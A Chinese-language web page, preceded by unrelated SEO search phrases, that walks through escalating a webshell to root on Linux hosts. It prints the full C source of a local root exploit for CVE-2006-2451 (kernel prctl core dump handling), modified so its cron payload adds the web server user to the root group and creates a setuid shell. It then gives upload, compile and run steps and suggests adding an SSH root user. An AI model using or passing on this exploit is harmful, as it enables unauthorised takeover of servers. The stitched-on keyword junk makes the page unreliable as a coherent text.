500m主机空间能做视频网站吗,如何建立微网站详细,免费发布信息的网站平台,今天的新闻内容摘抄30字用phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。前提#xff1a;1、目标机上安装了GCC能编译源码2、Kernel 2.6.x ( 2.6.13 2.6.17.4)因为是在webshell里溢出成功也得不到返回的ROOT SHELL,所…用phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。前提1、目标机上安装了GCC能编译源码2、Kernel 2.6.x ( 2.6.13 2.6.17.4)因为是在webshell里溢出成功也得不到返回的ROOT SHELL,所以要稍微修改下源码,把当前运行HTTP进程的用户加入到ROOT组(红色显示),让WEBSHELL有ROOT权限./**********溢出代码**************************//* Local r00t Exploit for: *//* Linux Kernel PRCTL Core Dump Handling *//* ( BID 18874 / CVE-2006-2451 ) *//* Kernel 2.6.x ( 2.6.13 2.6.17.4) *//* By: *//* - dreyer (main PoC code) *//* - RoMaNSoFt (local root code) *//* [ 10.Jul.2006 ] *//*****************************************************/#include #include #include #include #include #include #include #include char *payload\nSHELL/bin/sh\nPATH/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ;gpasswd -a wwwrun root ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n;int main() {int child;struct rlimit corelimit;printf(Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n);printf(By: dreyer RoMaNSoFt\n);printf([ 10.Jul.2006 ]\n\n);corelimit.rlim_cur RLIM_INFINITY;corelimit.rlim_max RLIM_INFINITY;setrlimit(RLIMIT_CORE, corelimit);printf([*] Creating Cron entry\n);if ( !( child fork() )) {chdir(/etc/cron.d);prctl(PR_SET_DUMPABLE, 2);sleep(200);exit(1);}kill(child, SIGSEGV);printf([*] Sleeping for aprox. one minute (** please wait **)\n);sleep(62);printf([*] Running shell (remember to remove /tmp/sh when finished) ...\n);system(/tmp/sh -p);}把上面的代码保存为tmp.c,上传到目标主机/tmp目录下,接着PHPSHELL里编译gcc -o tmp tmp.c ,然后执行./tmp(有时候需要执行几次才能成功).用whoami命令看下你会发现你的WEBSHELL权限是ROOT.char *payload 后面的命令都是以ROOT执行的,如果开放了SSH并且没做登陆限制,可以直接到那添加一个用户并加入到ROOT组,自己发挥~~~~~
